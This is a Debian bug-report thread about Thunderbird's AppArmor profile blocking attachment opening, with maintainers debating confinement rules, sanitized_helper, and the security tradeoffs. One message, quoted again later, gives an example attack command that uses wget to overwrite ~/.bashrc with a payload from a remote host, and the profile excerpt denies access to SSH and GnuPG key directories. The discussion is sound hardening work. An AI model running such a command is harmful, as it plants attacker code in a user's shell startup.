Bug#855346: thunderbird: Can't open attachments with AppArmor profile enforced
Control: tag -1 + fixed-upstream Thanks to Vincas this was fixed upstream: https://git.launchpad.net/apparmor-profiles/tree/ubuntu/17.10/usr.bin.thunderbird Carsten, could you please pull this updated profile? Cheers, -- intrigeri
Bug#855346: thunderbird: Can't open attachments with AppArmor profile enforced
On 2017.10.25 22:25, Simon Deziel wrote: Strange, preliminary test shows that totem is launched with it's profile, meanwhile evince is launched via thunderbird//sanitized_helper for unknown reason. I need to test some more. It's been that way for a long time, see [1]. Regards, Simon [1] https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1042771 Thanks for the info. Not sure why it's Low priority, if it renders abstractions (ubuntu-{browsers,..}) that use sanitized_helper kinda-almost-useless?
Bug#855346: thunderbird: Can't open attachments with AppArmor profile enforced
On 2017-10-25 03:08 PM, Vincas Dargis wrote: > On 2017.10.25 10:26, intrigeri wrote: >>> Also, if sanitized_helper contains: >> >>> `/{usr/,}bin/* Pixr,` >> >>> Doesn't this automatically mean that this line in usr.bin.thunderbird >>> profile >> >>> `/{usr/,}bin/* Cx -> sanitized_helper,` >> >>> will in result launch /usr/bin/totem with it's *P*rofile? >> >>> I wonder, because `abstractions/ubuntu-media-players has >>> `/usr/bin/totem Cxr -> sanitized_helper,`, maybe that would work? >>> I'll do some testing tomorrow. >> >> Indeed, it might be that the specific rules about evince & totem >> you're quoting from my patch above are not needed. It would be nice if >> we could drop them (and the maintenance cost of hard-coding a list of >> exceptions) so I'm hoping your testing confirms your hypothesis :) > > Strange, preliminary test shows that totem is launched with it's > profile, meanwhile evince is launched via thunderbird//sanitized_helper > for unknown reason. I need to test some more. It's been that way for a long time, see [1]. Regards, Simon [1] https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1042771 signature.asc Description: OpenPGP digital signature
Bug#855346: thunderbird: Can't open attachments with AppArmor profile enforced
On 2017.10.25 10:26, intrigeri wrote: Also, if sanitized_helper contains: `/{usr/,}bin/* Pixr,` Doesn't this automatically mean that this line in usr.bin.thunderbird profile `/{usr/,}bin/* Cx -> sanitized_helper,` will in result launch /usr/bin/totem with it's *P*rofile? I wonder, because `abstractions/ubuntu-media-players has `/usr/bin/totem Cxr -> sanitized_helper,`, maybe that would work? I'll do some testing tomorrow. Indeed, it might be that the specific rules about evince & totem you're quoting from my patch above are not needed. It would be nice if we could drop them (and the maintenance cost of hard-coding a list of exceptions) so I'm hoping your testing confirms your hypothesis :) Strange, preliminary test shows that totem is launched with it's profile, meanwhile evince is launched via thunderbird//sanitized_helper for unknown reason. I need to test some more. And totem does not even show it's GUI in new fresh Debian Sid GNOME. Maybe it needs patches you are proposing upstream.
Bug#855346: thunderbird: Can't open attachments with AppArmor profile enforced
Vincas Dargis: > On 2017.10.25 10:26, intrigeri wrote: >> Indeed, it might be that the specific rules about evince & totem >> you're quoting from my patch above are not needed. It would be nice if >> we could drop them (and the maintenance cost of hard-coding a list of >> exceptions) so I'm hoping your testing confirms your hypothesis :) > Yes I am going to test multiple format attachements just now. Amazing! :) > Personally, I would like to have bunch of abstractions to contain > all image, document viewers, editors and what not, […] I'm not looking forward to maintaining these abstractions. > With pending patch, some Thunderbird exploit needs just execute > `wget -O ~/.bashrc http://cracr.io:1337/own` and it's end game. Right. Sadly, the other currently available option is what we have now: breaking critical stuff in a way that encourages people to fully disable AppArmor and open a bunch of other holes in their system (by disabling all confinement for all other apps). This is exactly what I've been trying to avoid in the last years while working on AppArmor in Debian, and I'm sad we're shipping an AppArmor profile that breaks basic functionality here. > But let's fix this critical broken stuff and do the right way later. ACK, glad we're on the same page :) [Now, if we want to talk about the right way, I doubt it'll be with AppArmor: Flatpak and friends finally tackle the problems AppArmor can't solve for GUI apps.] Cheers, -- intrigeri
Bug#855346: thunderbird: Can't open attachments with AppArmor profile enforced
On 2017.10.25 10:26, intrigeri wrote: Indeed, it might be that the specific rules about evince & totem you're quoting from my patch above are not needed. It would be nice if we could drop them (and the maintenance cost of hard-coding a list of exceptions) so I'm hoping your testing confirms your hypothesis :) Yes I am going to test multiple format attachements just now. If there's extra rules for XFCE, maybe I should try Thunderbird on several DE. This would be sweet but right now the thing is totally broken, so fixing them on the default DE (GNOME) only would be a huge improvement already. I suggest you focus on getting this done first, and later we can test (or call for testing!) on other DEs. There's no way we can test all relevant configurations, so we'll need to rely on user testing to some degree anyway. OK if we call this urgent, we do as such. Personally, I would like to have bunch of abstractions to contain all image, document viewers, editors and what not, so that browsers, email clients and IM's could include them (or one big proxy-policy file that includes all these grouped -browsers -editors -viewers) and so have more restrictive policy. With pending patch, some Thunderbird exploit needs just execute `wget -O ~/.bashrc http://cracr.io:1337/own` and it's end game. But let's fix this critical broken stuff and do the right way later.
Bug#855346: thunderbird: Can't open attachments with AppArmor profile enforced
Hi Vincas, Vincas Dargis: > + # Allow opening attachments > + /{usr/,}bin/* Cx -> sanitized_helper, > + /{usr/,}sbin/* Cx -> sanitized_helper, > + /usr/local/{bin,sbin}/* Cx -> sanitized_helper, > + /usr/bin/evince Pix, > + /usr/bin/totem Pix, [...] > Do we really need sbin? I kind doubt there will be "document viewers", and it > has > setuid applications like pppd and exim4, which is not comforting. Good catch! Makes sense to me, feel free to drop the sbin bits as long as it does not obviously break stuff in your tests :) > Also, if sanitized_helper contains: > `/{usr/,}bin/* Pixr,` > Doesn't this automatically mean that this line in usr.bin.thunderbird profile > `/{usr/,}bin/* Cx -> sanitized_helper,` > will in result launch /usr/bin/totem with it's *P*rofile? > I wonder, because `abstractions/ubuntu-media-players has `/usr/bin/totem Cxr > -> sanitized_helper,`, maybe that would work? > I'll do some testing tomorrow. Indeed, it might be that the specific rules about evince & totem you're quoting from my patch above are not needed. It would be nice if we could drop them (and the maintenance cost of hard-coding a list of exceptions) so I'm hoping your testing confirms your hypothesis :) > If there's extra rules for XFCE, maybe I should try Thunderbird on several DE. This would be sweet but right now the thing is totally broken, so fixing them on the default DE (GNOME) only would be a huge improvement already. I suggest you focus on getting this done first, and later we can test (or call for testing!) on other DEs. There's no way we can test all relevant configurations, so we'll need to rely on user testing to some degree anyway. Cheers, -- intrigeri
Bug#855346: thunderbird: Can't open attachments with AppArmor profile enforced
Patch snippet: + # Allow opening attachments + /{usr/,}bin/* Cx -> sanitized_helper, + /{usr/,}sbin/* Cx -> sanitized_helper, + /usr/local/{bin,sbin}/* Cx -> sanitized_helper, + /usr/lib/libreoffice/program/soffice Cxr -> sanitized_helper, + /usr/bin/evince Pix, + /usr/bin/totem Pix, Do we really need sbin? I kind doubt there will be "document viewers", and it has setuid applications like pppd and exim4, which is not comforting. Also, if sanitized_helper contains: `/{usr/,}bin/* Pixr,` Doesn't this automatically mean that this line in usr.bin.thunderbird profile `/{usr/,}bin/* Cx -> sanitized_helper,` will in result launch /usr/bin/totem with it's *P*rofile? I wonder, because `abstractions/ubuntu-media-players has `/usr/bin/totem Cxr -> sanitized_helper,`, maybe that would work? I'll do some testing tomorrow. If there's extra rules for XFCE, maybe I should try Thunderbird on several DE.
Bug#855346: thunderbird: Can't open attachments with AppArmor profile enforced
Hello Mike, could you please add intrigeri to the pkg-mozilla group on Alioth? Seems to me this is not happen since intrigeri has requested access. Adding him to pkg-mozilla is helping Thunderbird by the apparmor integration a lot. Thanks! Am 20.09.2017 um 17:31 schrieb intrigeri: > Carsten Schoenert: >> On Sun, Sep 03, 2017 at 10:36:23AM +0200, intrigeri wrote: >>> By the way, IIRC Carsten told me that I could push such fixed directly >>> to the Vcs-Git. I've just tried to push my branch there, and was told: > [...] >> seems you have no access rights though. > [...] >> Should be solvable by getting access to the pkg-mozilla group on alioth. > > I've just requested access :) > -- Regards Carsten Schoenert
Bug#855346: thunderbird: Can't open attachments with AppArmor profile enforced
Carsten Schoenert: > On Sun, Sep 03, 2017 at 10:36:23AM +0200, intrigeri wrote: >> By the way, IIRC Carsten told me that I could push such fixed directly >> to the Vcs-Git. I've just tried to push my branch there, and was told: [...] > seems you have no access rights though. [...] > Should be solvable by getting access to the pkg-mozilla group on alioth. I've just requested access :)
Bug#855346: thunderbird: Can't open attachments with AppArmor profile enforced
Hello intrigeri, On Sun, Sep 03, 2017 at 10:36:23AM +0200, intrigeri wrote: ... > By the way, IIRC Carsten told me that I could push such fixed directly > to the Vcs-Git. I've just tried to push my branch there, and was told: > > remote: error: insufficient permission for adding an object to repository > database ./objects > remote: fatal: failed to write object > error: remote unpack failed: unpack-objects abnormal exit > To git+ssh://git.debian.org/git/pkg-mozilla/icedove.git >! [remote rejected] bugfix/874100 -> bugfix/874100 (unpacker error) > error: failed to push some refs to > 'git+ssh://git.debian.org/git/pkg-mozilla/icedove.git' seems you have no access rights though. tijuca-guest@moszumanska:/srv/git.debian.org/git/pkg-mozilla$ ls -l icedove.git/ insgesamt 96 drwxrwsr-x+ 2 agx pkg-mozilla 4096 Dez 18 2009 branches -rw-rwxr--+ 1 christi-guest pkg-mozilla 126 Feb 8 2017 config -rw-rwxr--+ 1 agx pkg-mozilla25 Dez 18 2009 description -rw-rwxr--+ 1 agx pkg-mozilla27 Apr 8 13:50 HEAD drwxrwsr-x+ 2 agx pkg-mozilla 4096 Dez 18 2009 hooks drwxrwsr-x+ 2 agx pkg-mozilla 4096 Jun 2 2016 info drwxrwsr-x+ 258 agx pkg-mozilla 4096 Aug 12 04:02 objects -rw-rw-r--+ 1 agx pkg-mozilla 43022 Jun 23 11:11 packed-refs drwxrwsr-x+ 4 agx pkg-mozilla 4096 Dez 18 2009 refs tijuca-guest@moszumanska:/srv/git.debian.org/git/pkg-mozilla$ id intrigeri | grep pkg-mozilla tijuca-guest@moszumanska:/srv/git.debian.org/git/pkg-mozilla$ Should be solvable by getting access to the pkg-mozilla group on alioth. More to this specific thing on #874100, I'm a bit time constraint for this right now. Regards Carsten
Bug#855346: thunderbird: Can't open attachments with AppArmor profile enforced
Control: tag -1 + patch Hi, (sorry for the delay, post-DebConf holiday / traveling + another conference) Michael Biebl: > They might want to usertag this bug accordingly Done with: bts user pkg-apparmor-t...@lists.alioth.debian.org \ . usertag 855346 + help-needed Feel free to do so yourself next time :) > Fwiw, I can confirm that opening attachments from TB with AA active is > currently broken e.g. for PDF files. My PDF viewer is evince. Indeed. I observe the same problem for OpenPGP keys, PNG images, Scribus .sla files and ODS spreadsheets: the profile we ship will forbid opening almost all kinds of attachments, and despite the "Open" action being advertised in the GUI, one currently has to first save the attachment and then open it from outside of Thunderbird. Such a restriction might make sense as long as AppArmor is disabled by default: users who want extra security hard enough to opt-in might be ready to live with it… although it's troubling that we advertise a broken "Open" action in this case. But I don't think it's acceptable now that we're seriously considering enabling AppArmor by default in Debian. The bugfix/855346 branch in the https://git-tails.immerda.ch/icedove.git repository has a fix based on Ulrike's branch + additional fixes. Please review & merge :) I'll forward my proposed change upstream once it's been clarified for this profile what's our upstream actually is: https://bugs.debian.org/874100 By the way, IIRC Carsten told me that I could push such fixed directly to the Vcs-Git. I've just tried to push my branch there, and was told: remote: error: insufficient permission for adding an object to repository database ./objects remote: fatal: failed to write object error: remote unpack failed: unpack-objects abnormal exit To git+ssh://git.debian.org/git/pkg-mozilla/icedove.git ! [remote rejected] bugfix/874100 -> bugfix/874100 (unpacker error) error: failed to push some refs to 'git+ssh://git.debian.org/git/pkg-mozilla/icedove.git' Cheers, -- intrigeri
Bug#855346: thunderbird: Can't open attachments with AppArmor profile enforced
Package: thunderbird Version: 1:45.7.1-1 Severity: normal The Thunderbird AppArmor profile breaks the ability to open attachments directly. (Saving them is possible.) For instance, when attempting to open an attached .png by selecting 'Open with Image Viewer', /usr/bin/eog fails to launch: audit: type=1400 audit(1487288200.755:153): apparmor="DENIED" operation="exec" profile="thunderbird" name="/usr/bin/eog" pid=5668 comm="thunderbird" requested_mask="x" denied_mask="x" fsuid=1000 ouid=0 Instead, a file type association prompt is shown, which doesn't do anything useful. Similar warnings are shown for /usr/bin/evince (.pdf), /usr/bin/file-roller (.tar.gz) and /usr/lib/libreoffice/program/soffice (.odt), but for some reason I am able to open .txt files with /usr/bin/gedit without issues. -- System Information: Debian Release: 9.0 APT prefers testing APT policy: (500, 'testing') Architecture: amd64 (x86_64) Kernel: Linux 4.9.0-1-amd64 (SMP w/2 CPU cores) Locale: LANG=nl_NL.UTF-8, LC_CTYPE=nl_NL.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash Init: systemd (via /run/systemd/system) Versions of packages thunderbird depends on: ii debianutils 4.8.1 ii fontconfig2.11.0-6.7 ii libasound21.1.3-4 ii libatk1.0-0 2.22.0-1 ii libc6 2.24-9 ii libcairo2 1.14.8-1 ii libdbus-1-3 1.10.14-1 ii libdbus-glib-1-2 0.108-2 ii libevent-2.0-52.0.21-stable-2.1 ii libffi6 3.2.1-6 ii libfontconfig12.11.0-6.7 ii libfreetype6 2.6.3-3+b1 ii libgcc1 1:6.3.0-6 ii libgdk-pixbuf2.0-02.36.4-1 ii libglib2.0-0 2.50.2-2 ii libgtk2.0-0 2.24.31-2 ii libhunspell-1.4-0 1.4.1-2+b1 ii libicu57 57.1-5 ii libnspr4 2:4.12-6 ii libnss3 2:3.26.2-1 ii libpango-1.0-01.40.3-3 ii libpangocairo-1.0-0 1.40.3-3 ii libpangoft2-1.0-0 1.40.3-3 ii libpixman-1-0 0.34.0-1 ii libsqlite3-0 3.16.2-2 ii libstartup-notification0 0.12-4 ii libstdc++66.3.0-6 ii libvpx4 1.6.1-2 ii libx11-6 2:1.6.4-3 ii libxcomposite11:0.4.4-2 ii libxdamage1 1:1.1.4-2+b1 ii libxext6 2:1.3.3-1 ii libxfixes31:5.0.3-1 ii libxrender1 1:0.9.10-1 ii libxt61:1.1.5-1 ii psmisc22.21-2.1+b1 ii zlib1g1:1.2.8.dfsg-5 Versions of packages thunderbird recommends: ii hunspell-en-us [hunspell-dictionary] 20070829-7 ii hunspell-nl [hunspell-dictionary] 1:5.2.5-1 pn lightning Versions of packages thunderbird suggests: ii apparmor 2.11.0-2 pn fonts-lyx ii libgssapi-krb5-2 1.15-1 -- Configuration Files: /etc/apparmor.d/usr.bin.thunderbird changed: @{MOZ_LIBDIR}=/usr/lib/thunderbird profile thunderbird /usr/lib/thunderbird/thunderbird { #include #include #include # TODO: finetune this for required accesses #include #include #include #include #include #include #include #include #include #include #include # For Xubuntu to launch the browser /usr/bin/exo-open ixr, /usr/lib/@{multiarch}/xfce4/exo-1/exo-helper-1 ixr, /etc/xdg/xdg-xubuntu/xfce4/helpers.rc r, /etc/xdg/xfce4/helpers.rc r, # for crash reports? ptrace (read,trace) peer=@{profile_name}, /usr/lib/thunderbird/thunderbird ixr, # Pulseaudio /usr/bin/pulseaudio Pixr, owner @{HOME}/.{cache,config}/dconf/user rw, owner /run/user/[0-9]*/dconf/user rw, owner @{HOME}/.config/gtk-3.0/bookmarks r, deny owner @{HOME}/.local/share/gvfs-metadata/* r, # potentially extremely sensitive files audit deny @{HOME}/.gnupg/** mrwkl, audit deny @{HOME}/.ssh/** mrwkl, # rw access to HOME is useful when sending/receiving attachments owner @{HOME}/** rw, # Required for LVM setups /sys/devices/virtual/block/dm-[0-9]*/uevent r, # Addons (too lax for thunderbird) ##include # for networking network inet stream, network inet6 stream, @{PROC}/[0-9]*/net/if_inet6 r, @{PROC}/[0-9]*/net/ipv6_route r, @{PROC}/[0-9]*/net/dev r, @{PROC}/[0-9]*/net/wireless r, # should maybe be in abstractions /etc/ r, /etc/mime.types r, /etc/mailcap r, /etc/xdg/*buntu/applications/defaults.listr, # for all derivatives /etc/xfce4/defaults.list r, /usr/share/xubuntu/applications/defaults.list r, owner @{HOME}/.local/share/applications/defaults.list r, owner @{HOME}/.local/share/applications/mimeapps.list r, owner @{HOME}/.local/share/applications/mimeinfo.cache r, owner /tmp/** m, owner /var/tmp/** m, /tmp/.X[0-9]*-lock r, /etc/udev/udev.conf r, # Doesn't seem to be required, but noisy. Maybe allow 'r' for 'b*' if needed. # Possibly move to